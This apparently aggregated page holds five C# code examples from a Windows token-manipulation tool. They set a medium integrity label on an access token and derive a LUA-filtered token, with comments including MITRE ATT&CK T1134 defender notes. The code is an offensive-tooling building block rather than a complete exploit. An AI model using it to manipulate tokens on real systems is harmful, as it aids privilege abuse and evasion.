Esempio n. 1
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
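        // Applies a mandatory integrity label to phNewToken and then asks the kernel for a
        // filtered copy of it, which is written to luaToken. Both are members declared
        // outside this method.
        //
        // Returns true only when the SID allocation, NtSetInformationToken and NtFilterToken
        // all succeed; any failure is printed to the console and yields false. The SID is
        // released on every path by the finally block.
        //
        // Defender note: rewriting a token's integrity label and deriving a filtered token is
        // access-token manipulation (MITRE ATT&CK T1134); a process doing this outside of
        // known administrative tooling is worth investigating.
        private bool _SetTokenInformation()
        {
            // {0,0,0,0,0,16} is SECURITY_MANDATORY_LABEL_AUTHORITY, the authority under which
            // Windows defines its integrity-level SIDs (S-1-16-*).
            Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority = new Winnt._SID_IDENTIFIER_AUTHORITY
            {
                Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 }
            };
            byte   nSubAuthorityCount = 1;
            IntPtr pSID;

            // 0x2000 is SECURITY_MANDATORY_MEDIUM_RID, so the SID built here is S-1-16-8192.
            if (!advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID))
            {
                Misc.GetWin32Error("AllocateAndInitializeSid: ");
                return(false);
            }

            Console.WriteLine(" [+] Initialized SID: 0x{0}", pSID.ToString("X4"));

            Winnt._SID_AND_ATTRIBUTES sidAndAttributes = new Winnt._SID_AND_ATTRIBUTES
            {
                Sid        = pSID,
                Attributes = (uint)Winnt.SE_GROUP_INTEGRITY_32
            };
            try
            {
                Winnt._TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Winnt._TOKEN_MANDATORY_LABEL
                {
                    Label = sidAndAttributes
                };
                int tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel);

                // Information class 25 is TokenIntegrityLevel.
                // Nt* routines report failure through their NTSTATUS return value and do not
                // set the thread's last Win32 error, so the status is printed as well; the
                // text produced by Misc.GetWin32Error alone may describe an unrelated call.
                var setStatus = ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize);
                if (0 != setStatus)
                {
                    Misc.GetWin32Error("NtSetInformationToken: ");
                    Console.WriteLine("[-] NtSetInformationToken NTSTATUS: 0x{0:X8}", setStatus);
                    return(false);
                }
                Console.WriteLine(" [+] Set Token Information On: 0x{0}", phNewToken.ToString("X4"));

                // Flag value 4 is LUA_TOKEN; no SIDs or privileges are listed explicitly
                // (the three IntPtr.Zero arguments).
                var filterStatus = ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken);
                if (0 != filterStatus)
                {
                    Misc.GetWin32Error("NtFilterToken: ");
                    Console.WriteLine("[-] NtFilterToken NTSTATUS: 0x{0:X8}", filterStatus);
                    return(false);
                }
                Console.WriteLine(" [+] LUA Token Handle: 0x{0}", luaToken.ToString("X4"));
            }
            catch (Exception ex)
            {
                Console.WriteLine("[-] {0}", ex.Message);
                return(false);
            }
            finally
            {
                // Memory from AllocateAndInitializeSid must be returned with FreeSid.
                advapi32.FreeSid(pSID);
            }
            return(true);
        }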
Esempio n. 2
 // Managed declaration of the Win32 AllocateAndInitializeSid function (Advapi32).
 // Allocates a SID under the given identifier authority using the first
 // nSubAuthorityCount of the eight sub-authority values and returns it through pSid.
 // Returns false on failure. A SID obtained this way has to be released with FreeSid.
 //
 // The native sub-authority parameters are DWORDs (unsigned 32-bit). They are declared
 // as int here, which has the same size; values above 0x7FFFFFFF need an unchecked cast.
 //
 // NOTE(review): the [DllImport] attribute is not visible in this excerpt. It needs
 // SetLastError = true for Marshal.GetLastWin32Error to be meaningful after a failure;
 // confirm against the full file.
 public static extern bool AllocateAndInitializeSid(
     ref Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority,
     byte nSubAuthorityCount,
     int dwSubAuthority0,
     int dwSubAuthority1,
     int dwSubAuthority2,
     int dwSubAuthority3,
     int dwSubAuthority4,
     int dwSubAuthority5,
     int dwSubAuthority6,
     int dwSubAuthority7,
     out IntPtr pSid
     );
Esempio n. 3
 // Managed declaration of the Win32 AllocateAndInitializeSid function (Advapi32).
 // Builds a SID from the identifier authority plus the first nSubAuthorityCount
 // sub-authority values; the remaining values are ignored by the API.
 // The allocated SID is returned in pSid and must later be released with FreeSid.
 // Returns false when the call fails.
 //
 // The native sub-authorities are unsigned 32-bit DWORDs; Int32 is size-compatible but
 // signed, so RIDs above 0x7FFFFFFF require an unchecked cast at the call site.
 //
 // NOTE(review): the [DllImport] attribute is outside this excerpt; verify it sets
 // SetLastError = true if callers read the last Win32 error after a failure.
 public static extern Boolean AllocateAndInitializeSid(
     ref Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority,
     byte nSubAuthorityCount,
     Int32 dwSubAuthority0,
     Int32 dwSubAuthority1,
     Int32 dwSubAuthority2,
     Int32 dwSubAuthority3,
     Int32 dwSubAuthority4,
     Int32 dwSubAuthority5,
     Int32 dwSubAuthority6,
     Int32 dwSubAuthority7,
     out IntPtr pSid
     );
Esempio n. 4
        ////////////////////////////////////////////////////////////////////////////////
        // Wrapper for AllocateAndInitializeSid - Hardest Possible way of doing it
        ////////////////////////////////////////////////////////////////////////////////
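        // Allocates a SID from `authority` and `subAuthority`, returns it through `psid`,
        // and prints the SID string plus the account name it maps to (when one exists).
        //
        //   authority    - identifier authority for the new SID.
        //   subAuthority - must hold at least eight values, because all eight slots are
        //                  passed to AllocateAndInitializeSid.
        //   psid         - receives the allocated SID; the caller owns it and has to
        //                  release it with FreeSid.
        //
        // Returns false when the arguments are unusable or the allocation fails. Returns
        // true once the SID is allocated, even if the diagnostic lookup that follows
        // cannot produce a string or an account name.
        private static bool InitializeSid(Winnt._SID_IDENTIFIER_AUTHORITY authority, uint[] subAuthority, ref IntPtr psid)
        {
            // Indexes 0..7 are read unconditionally below; reject short arrays up front
            // instead of failing with an IndexOutOfRangeException.
            if (subAuthority == null || subAuthority.Length < 8)
            {
                Console.WriteLine("InitializeSid: subAuthority must contain 8 values");
                return(false);
            }

            // NOTE(review): the sub-authority count is fixed at 1, so only subAuthority[0]
            // ends up in the SID and the other seven values are ignored by the API.
            // Confirm that this is intended.
            bool retVal = advapi32.AllocateAndInitializeSid(
                ref authority,
                1,
                subAuthority[0],
                subAuthority[1],
                subAuthority[2],
                subAuthority[3],
                subAuthority[4],
                subAuthority[5],
                subAuthority[6],
                subAuthority[7],
                out psid);

            if (!retVal)
            {
                Misc.GetWin32Error("AllocateAndInitializeSid");
                return(false);
            }

            IntPtr hStringUserSid = IntPtr.Zero;

            advapi32.ConvertSidToStringSid(psid, ref hStringUserSid);
            if (hStringUserSid == IntPtr.Zero)
            {
                // Conversion failed. The SID itself is valid, so only the diagnostic
                // output is skipped; previously a null string reached SecurityIdentifier
                // and threw an exception that nothing here caught.
                Misc.GetWin32Error("ConvertSidToStringSid");
                return(true);
            }

            string sddl;
            try
            {
                sddl = Marshal.PtrToStringAuto(hStringUserSid);
            }
            finally
            {
                // The buffer comes from ConvertSidToStringSid and must be released with
                // LocalFree, which is what Marshal.FreeHGlobal calls on Windows.
                Marshal.FreeHGlobal(hStringUserSid);
            }

            string accountName = string.Empty;

            try
            {
                accountName = new System.Security.Principal.SecurityIdentifier(sddl)
                              .Translate(typeof(System.Security.Principal.NTAccount)).ToString();
            }
            catch (System.Security.Principal.IdentityNotMappedException ex)
            {
                // Not every SID maps to an account; print the reason and continue.
                Console.WriteLine(ex.Message);
            }

            Console.WriteLine("   - " + accountName + " " + sddl);
            return(true);
        }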
Esempio n. 5
        ////////////////////////////////////////////////////////////////////////////////
        ////////////////////////////////////////////////////////////////////////////////
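        // Applies a mandatory integrity label to phNewToken and then requests a filtered
        // copy of that token, which is stored in luaToken. Both are members declared
        // outside this method.
        //
        // Returns true when the SID allocation, NtSetInformationToken and NtFilterToken
        // all succeed, and false otherwise, printing the failure to the console.
        //
        // Defender note: changing a token's integrity label and deriving a filtered token
        // is access-token manipulation (MITRE ATT&CK T1134); treat it as suspicious when
        // it comes from anything other than known administrative tooling.
        public Boolean SetTokenInformation()
        {
            // {0,0,0,0,0,16} is SECURITY_MANDATORY_LABEL_AUTHORITY (integrity-level SIDs).
            Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority = new Winnt._SID_IDENTIFIER_AUTHORITY();
            pIdentifierAuthority.Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 };
            Byte   nSubAuthorityCount = 1;
            IntPtr pSID;

            // 0x2000 is SECURITY_MANDATORY_MEDIUM_RID, giving the SID S-1-16-8192.
            if (!advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID))
            {
                GetWin32Error("AllocateAndInitializeSid: ");
                return(false);
            }

            // Every exit from here on goes through the finally block. The SID used to be
            // released on the success path only and leaked whenever an Nt* call failed.
            try
            {
                // ToInt64 instead of ToInt32: in a 64-bit process a pointer or handle can
                // exceed Int32 range, in which case ToInt32 throws OverflowException.
                Console.WriteLine(" [+] Initialized SID: {0}", pSID.ToInt64());

                Winnt._SID_AND_ATTRIBUTES sidAndAttributes = new Winnt._SID_AND_ATTRIBUTES();
                sidAndAttributes.Sid        = pSID;
                sidAndAttributes.Attributes = Constants.SE_GROUP_INTEGRITY_32;

                Winnt._TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Winnt._TOKEN_MANDATORY_LABEL();
                tokenMandatoryLabel.Label = sidAndAttributes;
                Int32 tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel);

                // Information class 25 is TokenIntegrityLevel.
                // NOTE(review): Nt* routines return an NTSTATUS and do not set the thread's
                // last Win32 error, so GetWin32Error may describe an unrelated call.
                if (0 != ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize))
                {
                    GetWin32Error("NtSetInformationToken: ");
                    return(false);
                }
                Console.WriteLine(" [+] Set Token Information : {0}", phNewToken.ToInt64());

                // Flag value 4 is LUA_TOKEN.
                if (0 != ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken))
                {
                    GetWin32Error("NtFilterToken: ");
                    return(false);
                }
                Console.WriteLine(" [+] Set LUA Token Information : {0}", luaToken.ToInt64());
                return(true);
            }
            finally
            {
                // Memory from AllocateAndInitializeSid must be returned with FreeSid.
                advapi32.FreeSid(pSID);
            }
        }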